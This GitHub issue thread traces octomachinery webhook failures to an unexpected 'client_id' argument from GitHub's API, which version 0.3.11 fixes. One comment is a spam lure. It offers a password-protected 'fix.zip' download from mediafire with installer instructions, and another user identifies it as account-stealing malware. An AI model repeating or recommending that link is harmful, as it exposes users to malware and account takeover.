### ISSUE TITLE
Webhooks have started to fail with `TypeError: __init__() got an unexpected keyword argument 'client_id'`

### ISSUE THREAD

**Issue by ekohl** [sanitizers/octomachinery#66]
At 2024-08-27 14:00:25 I saw the last successful webhook delivery. After that it has started to fail with:
```
Traceback (most recent call last):
File "/opt/app-root/src/app.py", line 5, in <module>
run_prprocessor_app()
File "/opt/app-root/src/prprocessor/__main__.py", line 513, in run_prprocessor_app
run_app(
File "/opt/app-root/lib64/python3.9/site-packages/octomachinery/app/server/runner.py", line 71, in run
run_until_complete(run_server_forever, config, event_routers)
File "/opt/app-root/lib64/python3.9/site-packages/anyio/__init__.py", line 72, in run
return asynclib.run(func, *args, **backend_options) # type: ignore
File "/opt/app-root/lib64/python3.9/site-packages/anyio/_backends/_asyncio.py", line 114, in run
raise exception
File "/opt/app-root/lib64/python3.9/site-packages/anyio/_backends/_asyncio.py", line 76, in wrapper
retval = await func(*args)
File "/opt/app-root/lib64/python3.9/site-packages/octomachinery/utils/asynctools.py", line 15, in async_func_wrapper
return await async_func(*args, **kwargs)
File "/opt/app-root/lib64/python3.9/site-packages/octomachinery/app/server/machinery.py", line 134, in run_forever
await _prepare_github_app(github_app)
File "/opt/app-root/lib64/python3.9/site-packages/octomachinery/app/server/machinery.py", line 64, in _prepare_github_app
await github_app.log_installs_list()
File "/opt/app-root/lib64/python3.9/site-packages/octomachinery/github/api/app_client.py", line 71, in log_installs_list
installations = await self.get_installations()
File "/opt/app-root/lib64/python3.9/site-packages/octomachinery/github/api/app_client.py", line 133, in get_installations
async for install in amap(
File "/opt/app-root/lib64/python3.9/site-packages/octomachinery/utils/asynctools.py", line 83, in amap
yield await try_await(callback(async_value))
File "/opt/app-root/lib64/python3.9/site-packages/octomachinery/utils/asynctools.py", line 68, in try_await
return await potentially_awaitable
File "/opt/app-root/lib64/python3.9/site-packages/octomachinery/utils/asynctools.py", line 89, in callback_wrapper
return await try_await(callback(**args_dict))
TypeError: __init__() got an unexpected keyword argument 'client_id'
```

The container was built 25 days ago and runs https://github.com/theforeman/prprocessor. I've seen this happen before when GitHub changed their webhooks, but from the trace it's not obvious to me where it's failing.

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MahouShoujoMivutilde** [comment]
Do **NOT** run it.

It's malware that'll steal your account if executed, to spread further spamming the same message elsewhere, like happened to this person.

There are a lot of comments like that

https://github.com/search?q=is%3Aissue+%22In+the+installer+menu%2C+select+%5C%22gcc.%5C%22%22+AND+%22password%3A+changeme%22&type=issues&s=created&o=desc

(and this is how I found this issue)

**Comment by webknjaz** [comment]
@ekohl thanks, I made a long-term fix 2 days ago: https://github.com/sanitizers/octomachinery/issues/61.

**Comment by ekohl** [comment]
Weird that for us it only started to show up yesterday while for you it showed up earlier.

**Comment by ekohl** [comment]
I just updated to 0.3.11 and it works again. I can see the following warning show up though:
```
WARNING:octomachinery.utils.asynctools:Excessive arguments passed to callback <class 'octomachinery.github.models.GitHubAppInstallation'>
```

**Comment by webknjaz** [comment]
> Weird that for us it only started to show up yesterday while for you it showed up earlier.

Yeah, I think it started showing up in one app a day earlier than in the other. They're probably rolling it out gradually.


> I can see the following warning show up though:

That's my long-term fix. A warning can give us time to act and change the model instead of crashing the entire program. I'm yet to update the model, though. I have Sentry integrated, so I will see those warnings reported now.
